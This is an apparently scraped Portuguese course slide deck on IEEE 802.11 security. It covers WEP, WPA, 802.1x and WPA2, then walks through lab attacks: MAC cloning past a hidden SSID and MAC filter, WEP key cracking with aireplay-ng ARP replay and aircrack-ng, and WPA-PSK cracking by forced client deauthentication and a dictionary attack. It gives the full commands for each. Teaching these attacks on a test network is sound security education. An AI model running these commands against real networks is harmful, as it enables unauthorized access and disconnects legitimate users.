A EDUCAÇÃO FÍSICA NO NOVO ENSINO MÉDIO: IMPLICAÇÕES E TENDÊNCIAS PROMOVIDAS P...
 
6ano variação linguística ensino fundamental.pptx
6ano variação linguística ensino fundamental.pptx6ano variação linguística ensino fundamental.pptx
6ano variação linguística ensino fundamental.pptx
 
O desenvolvimento é um conceito mais amplo, pode ter um contexto biológico ou...
O desenvolvimento é um conceito mais amplo, pode ter um contexto biológico ou...O desenvolvimento é um conceito mais amplo, pode ter um contexto biológico ou...
O desenvolvimento é um conceito mais amplo, pode ter um contexto biológico ou...
 
Currículo - Ícaro Kleisson - Tutor acadêmico.pdf
Currículo - Ícaro Kleisson - Tutor acadêmico.pdfCurrículo - Ícaro Kleisson - Tutor acadêmico.pdf
Currículo - Ícaro Kleisson - Tutor acadêmico.pdf
 
Educação Financeira - Cartão de crédito665933.pptx
Educação Financeira - Cartão de crédito665933.pptxEducação Financeira - Cartão de crédito665933.pptx
Educação Financeira - Cartão de crédito665933.pptx
 
Caderno de exercícios Revisão para o ENEM (1).pdf
Caderno de exercícios Revisão para o ENEM (1).pdfCaderno de exercícios Revisão para o ENEM (1).pdf
Caderno de exercícios Revisão para o ENEM (1).pdf
 
Polígonos, Diagonais de um Polígono, SOMA DOS ANGULOS INTERNOS DE UM POLÍGON...
Polígonos, Diagonais de um Polígono, SOMA DOS ANGULOS INTERNOS DE UM  POLÍGON...Polígonos, Diagonais de um Polígono, SOMA DOS ANGULOS INTERNOS DE UM  POLÍGON...
Polígonos, Diagonais de um Polígono, SOMA DOS ANGULOS INTERNOS DE UM POLÍGON...
 
Historia de Portugal - Quarto Ano - 2024
Historia de Portugal - Quarto Ano - 2024Historia de Portugal - Quarto Ano - 2024
Historia de Portugal - Quarto Ano - 2024
 
Monoteísmo, Politeísmo, Panteísmo 7 ANO2.pptx
Monoteísmo, Politeísmo, Panteísmo 7 ANO2.pptxMonoteísmo, Politeísmo, Panteísmo 7 ANO2.pptx
Monoteísmo, Politeísmo, Panteísmo 7 ANO2.pptx
 
GUIA DE APRENDIZAGEM 2024 9º A - História 1 BI.doc
GUIA DE APRENDIZAGEM 2024 9º A - História 1 BI.docGUIA DE APRENDIZAGEM 2024 9º A - História 1 BI.doc
GUIA DE APRENDIZAGEM 2024 9º A - História 1 BI.doc
 
Expansão Marítima- Descobrimentos Portugueses século XV
Expansão Marítima- Descobrimentos Portugueses século XVExpansão Marítima- Descobrimentos Portugueses século XV
Expansão Marítima- Descobrimentos Portugueses século XV
 
M0 Atendimento – Definição, Importância .pptx
M0 Atendimento – Definição, Importância .pptxM0 Atendimento – Definição, Importância .pptx
M0 Atendimento – Definição, Importância .pptx
 
LENDA DA MANDIOCA - leitura e interpretação
LENDA DA MANDIOCA - leitura e interpretaçãoLENDA DA MANDIOCA - leitura e interpretação
LENDA DA MANDIOCA - leitura e interpretação
 

Ataque Redes Wireless - Prática de Ataques

  • 1. Tecnologia em Redes de Computadores Gerência de Redes Prática de Ataques - wireless Professor: André Peres andre.peres@poa.ifrs.edu.br Instituto Federal do Rio Grande do Sul - IFRS Porto Alegre
  • 2. Enlace IEEE 802.11 Existem 3 tipos de enlace IBSS (Independent Basic Service Set) = ad-hoc BSS (Basic Service Set) ESS (Extended Service Set)
  • 3. Enlace IEEE 802.11 IBSS ou ad-hoc Criada de maneira espontânea Área de abrangência pequena Sem controle centralizado
  • 4. Enlace IEEE 802.11 BSS Controle centralizado (AP – Access Point) • Concentrador (hub) para rede sem fios • Comutador (switch) entre enlaces com/sem fio • Área de abrangência definida pelo AP
  • 5. Enlace IEEE 802.11 ESS Múltiplos BSSs APs se comunicam via DS (distributed system) Objetivo: roaming
  • 6. Enlace IEEE 802.11 Ligação entre redes: Pode utilizar BSS ou IBSS Com BSS • Um AP • Dois APs (um é configurado como cliente)
  • 7. Enlace IEEE 802.11 Nível de enlace IEEE 802.11 Controle de comunicação de nível físico Baseado no padrão IEEE 802.3 (ethernet) Utiliza endereços MAC compatíveis com ethernet Controle de acesso ao meio: CSMA/CA Controle de erros tipo stop-and-wait
  • 8. Enlace IEEE 802.11 Para conexão de uma estação com a rede Deve respeitar uma máquina de estados:
  • 9. Enlace IEEE 802.11 Para conexão de uma estação com a rede Configuração da placa cliente • Tipo de rede (BSSType) – Ad-hoc – Infra estrutura (BSS) – Qualquer • Nome da rede (SSID) – Uma rede específica – Qualquer rede
  • 10. Enlace IEEE 802.11 Para conexão de uma estação com a rede Configuração da placa cliente • Tipo de descoberta da rede (scan type) – Passivo → aguarda beacon frames – Ativo → utiliza probe request • Canal a ser utilizado (channel) – Especifica um canal 1 → 11 – Qualquer canal (faz varredura de todos em busca da rede)
  • 11. Enlace IEEE 802.11 Para conexão de uma estação com a rede A estação deve “encontrar” a rede • O AP divulga sua existência através de beacon frames
  • 12. Enlace IEEE 802.11 Para conexão de uma estação com a rede • Por segurança o AP pode não divulgar o nome da rede, obrigando a estação a utilizar probe request
  • 13. Enlace IEEE 802.11 Para conexão de uma estação com a rede • O AP responde ao Probe Request com um Probe Response:
  • 14. Enlace IEEE 802.11 Para conexão de uma estação com a rede Após a identificação do SSID e troca de mensagens iniciais • Estado 1 → Não autenticado, Não associado Passa-se para a fase de autenticação • Padrão inicial: – Open System – Shared Key (WEP) • Adicionados Posteriormente: – PSK - Pre-Shared Key (WPA, WPA2) – 802.1x (WEP, WPA, WPA2)
  • 15. Enlace IEEE 802.11 Autenticação Open System Autenticação nula Qualquer estação é autenticada por padrão Protocolo: 1 → Estação envia uma requisição de autenticação 2 → AP aceita a autenticação (sempre successfull)
  • 16. Enlace IEEE 802.11 Autenticação Shared Key Utiliza WEP com texto desafio • O WEP utiliza criptografia simétrica (chave única)
  • 17. Enlace IEEE 802.11 Autenticação Pre-Shared Key Similar ao Shared Key A chave é utilizada apenas na autenticação Autenticação 802.1x Necessita de um servidor RADIUS O AP serve como um NAS (Network Access Server) A comunicação ocorre entre cliente e servidor RADIUS O servidor RADIUS informa ao AP o resultado da autenticação
  • 18. Enlace IEEE 802.11 Para conexão de uma estação com a rede Após a autenticação • Estado 2 → Autenticado, Não associado Fase de associação • Passagem automática do estado 2 → 3 • Estado 3 → Autenticado, Associado • Agora a estação pode receber/transmitir quadros de enlace na rede • Acesso ao servidor DHCP, etc...
  • 19. Segurança IEEE 802.11 A autenticação faz parte do processo de segurança Após a autenticação, a estação passa para o estado de autenticado/associado Somente neste estado, a estação pode trocar quadros de enlace com a rede
  • 20. Segurança IEEE 802.11 Criptografia WEP (Wired Equivalent Privacy) • Baseia-se na dificuldade do atacante em obter um segredo compartilhado entre as estações • Utiliza criptografia simétrica – Mesma chave para cifragem e decifragem de quadros • Baseado no algoritmo RC4 – Não é uma implementação pura do RC4 – Foram feitas modificações...
  • 23. Segurança IEEE 802.11 WEP Criptografia simétrica utilizando operações XOR Necessita de uma chave com o mesmo tamanho da mensagem (inviável) Para contornar este problema utiliza o gerador de números pseudo-aleatórios (PRNG) do RC4 Funcionamento: utiliza uma SEMENTE secreta para gerar a chave de cifragem do mesmo tamanho da mensagem
  • 24. Segurança IEEE 802.11 WEP A chave não pode ser reaproveitada em dois quadros MSG [XOR] CIF → CHAVE Se atacante insere ou conhece a mensagem original e captura mensagem cifrada, obtém a chave utilizada
  • 25. Segurança IEEE 802.11 WEP Utilização de chave única → problema de sincronismo !
  • 26. Segurança IEEE 802.11 WEP Necessária chave única, para cada quadro de enlace Quadros de até 3000 bytes a 54 Mbps = muitas chaves diferentes por segundo Uma semente gera uma chave... A mesma semente deve ser utilizada por todas as estações
  • 27. Segurança IEEE 802.11 WEP Solução → utilização de um vetor de inicialização em conjunto com a semente IV (Initialization Vector) → 24 bits randômicos • Deve ser divulgado para a estação que irá decifrar o quadro
  • 30. Segurança IEEE 802.11 WEP O segredo permanece o mesmo, enquanto o IV é alterado a cada quadro de enlace IV → 24 bits Segredo → 5 bytes → 40 bits = WEP64 Segredo → 13 bytes → 104 bits = WEP128
  • 31. Segurança IEEE 802.11 Problemas do WEP Utilização de chaves repetidas IV → 24 bits → 224 combinações Quadros de 1500 bytes a 11 Mbps (1500 x 8 x 224) / (11 x 106)= 1800 segundos Aproximadamente 5 horas Excluindo possibilidade de 2 máquinas utilizarem o mesmo IV.... .... ...
  • 32. Segurança IEEE 802.11 Problemas do WEP Os bits permanecem na mesma posição do quadro... • Se atacante deseja alterar um bit, basta inverter o seu valor • Além disso, deve identificar a alteração no CRC32 Se atacante captura uma chave, já pode gerar pacotes falsos na rede utilizando esta chave/IV
  • 33. Segurança IEEE 802.11 Problemas do WEP Pesquisa de Fluhrer, Mantin, Shamir “Weaknesses in the key scheduling Algorithm of RC4” Possíveis chaves fracas no PRNG do RC4 Ao utilizar uma chave fraca, identifica bits da semente O WEP utiliza muitas sementes diferentes, gerando muitas chaves fracas
  • 34. Segurança IEEE 802.11 Problemas do WEP Programas WEPCrack e AirSnort Total de pacotes: 2,5 milhões Pacotes “interessantes”: 1878 Segredo: xC513
  • 35. Segurança IEEE 802.11 Problemas do WEP Programas WEPCrack e AirSnort Total de pacotes: 7,3 milhões Pacotes “interessantes”: 4160 Segredo: xCd513ewq1pkm
  • 36. Segurança IEEE 802.11 Problemas do WEP Análise dos bits iniciais de uma mensagem cifrada • O LLC inclui sempre os mesmos bits: 0xaa Inferir através de análise probabilística os bits da semente (os primeiros bits são o IV) Isto facilita a descoberta dos demais bits da semente (segredo compartilhado)
  • 37. Segurança IEEE 802.11 WPA (Wi-fi Protected Access) Após descoberta das vulnerabilidades WEP Criado grupo de trabalho IEEE 802.11i • Responsável pelo novo protocolo de segurança 802.11 • Reuniões entre fabricantes e comunidade científica Fornecedores preocupados • Demora com 802.11i • Criada Wi-Fi Alliance • Necessidade de compatibilidade com hardware antigo • Apenas atualização de firmware
  • 38. Segurança IEEE 802.11 WPA (Wi-fi Protected Access) Para manter o hardware → novo esquema rodando sobre protocolo antigo (WEP) Protocolo WPA (ano: 2002) • Mantém o WEP • Contém mecanismo de troca de segredo (parte da semente além do IV) periodicamente → TKIP (Temporal Key Integrity Protocol) • Permite autenticação via PSK ou 802.1x
  • 39. Segurança IEEE 802.11 WPA (Wi-fi Protected Access) MICHAEL • Substitui o CRC32 para verificação de integridade de mensagens • Gera um cálculo de 64 bits • Serve para impedir que um atacante consiga inserir quadros em uma rede cifrada
  • 40. Segurança IEEE 802.11 WPA (Wi-fi Protected Access) TKIP • Troca dinâmica de segredo • Necessita de um novo mecanismo de autenticação • Como o segredo é trocado, não pode utilizar a chave dinâmica como autenticação (o cliente não conhece a chave) PSK (Pre-Shared Key) • Chave “mestra” utilizada no processo de autenticação • Utilizada inicialmente para ingresso na rede • Após autenticação, estação recebe a chave que está sendo utilizada pelas demais estações na rede
  • 41. Segurança IEEE 802.11 WPA (Wi-fi Protected Access) PSK (Pre-Shared Key) • É o ponto pelo qual um atacante tenta obter acesso à rede • Atacante captura processo de autenticação e tenta identificar a PSK utilizada neste processo • Ao obter a PSK, consegue entrar na rede • Como o número de quadros trocados na autenticação é pequeno, o ataque deve ser baseado em força bruta • Força bruta → dicionário de senhas + software de análise da autenticação WPA
  • 42. Segurança IEEE 802.11 WPA + 802.1x • Alternativa ao PSK • Não possui chave inicial • Usuário deve se autenticar com servidor RADIUS – PEAP (usuário/senha) – Certificado – … • Necessário servidor RADIUS • AP serve como ponte entre estação e RADIUS
  • 43. Segurança IEEE 802.11 802.1x • Baseado no conceito de “portas” – Enquanto a estação não finaliza o processo de autenticação fica com a “porta” para a rede fechada – A única comunicação permitida é com o servidor RADIUS – Apenas no final da autenticação com sucesso (indicada pelo servidor RADIUS para o AP) o AP libera o acesso • Processo de autenticação ocorre no nível de enlace
  • 54. Segurança IEEE 802.11 802.1x • No caso de uso de certificados, apenas quem possui certificado válido (CA) pode acessar a rede • No caso de EAP, verificado usuário/senha – Possibilidade de força bruta • O AP é autenticado junto ao RADIUS, impedindo AP falso • Possibilidade de ataques com AP+RADIUS falsos – Atacante realiza a autenticação do cliente – Não funciona com TLS (autenticação mútua AP ↔ Estação) via certificados
  • 55. Segurança IEEE 802.11 WPA2 (IEEE 802.11i) Ano: 2004 Substituição total do protocolo criptográfico Utilização do AES(Advanced Encryption Standard) • Robusto • Sem ataques à criptografia conhecidos • Padrão de criptografia adotado por diversos softwares/equipamentos Incompatível com equipamentos anteriores Autenticação via PSK e 802.1x, Criptografia AES
  • 56. Segurança IEEE 802.11 Na prática WEP → fora ! Usuário doméstico/SOHO: • Equipamentos antigos ( → 2004): WPA/PSK • Equipamentos novos (2004 → ): WPA2/PSK Usuário empresarial: • Equipamentos antigos ( → 2004) : WPA/802.1x • Equipamentos novos (2004 → ) : WPA2/802.1x
  • 57. Ataques Visão do atacante: 1. criptografia nenhuma WEP WPA WPA-2
  • 58. Ataques Visão do atacante: 2. autenticação nenhuma shared-key PSK 802.1x
  • 59. Ataques Visão do atacante: 3. mecanismos adicionais nenhum Filtro MAC SSID escondido Mecanismos layer 3 (firewall, etc...)
  • 60. Ataques Cenários de testes: 1 – AP com SSID escondido e filtro de MAC Ataque: captura de probes + clonagem de MAC 2 – WEP Ataque: quebra do WEP via software 3 – WPA Ataque: desconexão de um cliente + captura de autenticação + força bruta
  • 61. Ataques 1 – AP com SSID escondido e filtro de MAC Ataque: captura de probes + clonagem de MAC Passos: Descoberta do SSID: - colocar a placa de redes sem fios em modo monitor - capturar tráfego via wireshark, tcpdump, etc....
  • 62. Ataques 1 – AP com SSID escondido e filtro de MAC Configurando o AP
  • 63. Ataques 1 – AP com SSID escondido e filtro de MAC Obtendo o nome da rede: # ip l s wlan0 down # iwconfig wlan0 mode monitor # iwconfig wlan0 channel 8 # ip l s wlan0 up Executar o wireshark e aguardar os “probes”
  • 64. Ataques 1 – AP com SSID escondido e filtro de MAC Obtendo o nome da rede:
  • 65. Ataques 1 – AP com SSID escondido e filtro de MAC Buscar por pacotes de probe (OK) Buscar pelo MAC address de uma estação que está navegando Identificar faixa de endereços IP utilizados e buscar por um IP que não está sendo usado Objetivo: Mesmo MAC, IP diferente....
  • 66. Ataques 1 – AP com SSID escondido e filtro de MAC Configurando o AP
  • 67. Ataques 1 – AP com SSID escondido e filtro de MAC Obtendo o MAC de uma estação da rede: - placa em modo monitor - wireshark...
  • 68. Ataques 1 – AP com SSID escondido e filtro de MAC Obtendo o MAC de uma estação da rede:
  • 69. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC: Atacante Alvo ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico
  • 70. Ataques 1 – AP com SSID escondido e filtro de MAC Alvo envia um quadro Clonagem de MAC: AP verifica MAC origem Atacante Alvo OK ! ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D OK ! 11:11 AA:AA 10.1.1.2 200.1.1.1
  • 71. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC: Atacante Alvo Volta a resposta ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • 72. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC: As duas placas de Atacante Alvo rede aceitam... e repassam para o IP ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • 73. Ataques IP destino = 10.1.1.1? 1 – AP com SSID escondido e filtro de MAC NÃO ! Eu sou um roteador? Clonagem de MAC: NÃO ! Atacante Alvo → descarta o pacote !!! ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • 74. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC: Ou seja... Duas máquinas com mesmo MAC e IP's diferentes podem “navegar” simultaneamente (layer3) … afinal é possível ter uma máquina com mais de um IP vinculado na mesma placa de rede....
  • 75. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC e associação com AP: # killall nm-applet # ip l s wlan0 down # ip l s wlan0 address 00:1b:77:b9:51:49 # ip a a 10.1.0.200/24 dev wlan0 # ip l s wlan0 up # iwconfig wlan0 essid sectest ap 00:1c:f0:63:a8:7e channel 8 # tail -f /var/log/syslog --------------------------------- kernel: [ 225.723137] wlan0: waiting for beacon from 00:1c:f0:63:a8:7e kernel: [ 225.757365] wlan0: beacon received kernel: [ 225.783319] wlan0: associate with 00:1c:f0:63:a8:7e (try 1) kernel: [ 225.785939] wlan0: RX AssocResp from 00:1c:f0:63:a8:7e (capab=0x401 status=0 aid=1) kernel: [ 225.785943] wlan0: associated
  • 76. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC e associação com AP: - não utilizar o serviço de DHCP... - configurar na mão: → roteador default → servidor de DNS
  • 77. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC e associação com AP:
  • 78. Ataques 2 – Quebra de WEP via software Vulnerabilidade – PRNG do RC4 gerando chaves fracas... Técnica: 1. captura de pacotes cifrados com diferentes IVs 2. análise dos pacotes (software) para obtenção do segredo compartilhado
  • 79. Ataques 2 – Quebra de WEP via software Passos: 1. colocar a placa de rede em modo monitor para captura do tráfego cifrado: # ip l s wlan0 down # iwconfig wlan0 mode monitor # iwconfig wlan0 channel 8 # ip l s wlan0 up
  • 80. Ataques 2 – Quebra de WEP via software Passos: 2. instalação do software aircrack-ng # apt-get install aircrack-ng 3. captura do tráfego (descoberta das redes) # airodump-ng wlan0
  • 81. Ataques 2 – Quebra de WEP via software Passos: 4. em outro terminal – captura do tráfego cifrado de uma rede específica para posterior análise # airodump-ng --channel 8 --bssid 00:1C:F0:63:A8:7E -w wep1 wlan0 5. para diminuir tempo, geração de tráfego (requisição de autenticação com o AP) # aireplay-ng -1 0 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62 wlan0
  • 82. Ataques 2 – Quebra de WEP via software Passos: 6. captura da requisição de autenticação (os pacotes ARP) e repetição dos mesmos para geração de mais tráfego # aireplay-ng -3 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62 wlan0 7. Após obter um número significativo de pacotes, tentar a análise... # aircrack-ng -b 00:1C:F0:63:A8:7E wep1-01.cap
  • 83. Ataques 2 – Quebra de WEP via software Obs: necessário grande volume de tráfego para análise... porém, com tráfego suficiente, sempre se consegue o segredo compartilhado
  • 84. Ataques 3 – Quebra de WPA via software Vulnerabilidade: Mesmo protocolo de autenticação do WEP quando utilizado PSK Técnica: Obtenção dos quadros de associação e posterior força bruta na PSK
  • 85. Ataques 3 – Quebra de WPA via software Passos: 1. colocar a placa de rede em modo monitor 2. monitorar com airodump-ng 3. captura de pacotes cifrados (especificar WPA) # airodump-ng --channel 8 -w wpa --bssid 00:1C:F0:63:A8:7E -w wpa1 wlan0
  • 86. Ataques 3 – Quebra de WPA via software Passos: 4. força a desautenticação de um cliente para captura dos quadros de autenticação (falsifica mensagem de desaut. do AP) # aireplay-ng -0 5 -a 00:1C:F0:63:A8:7E wlan0 5. utiliza força bruta (dicionário) para tentar obter PSK # aircrack-ng -w dicionario.txt wpa1-01.cap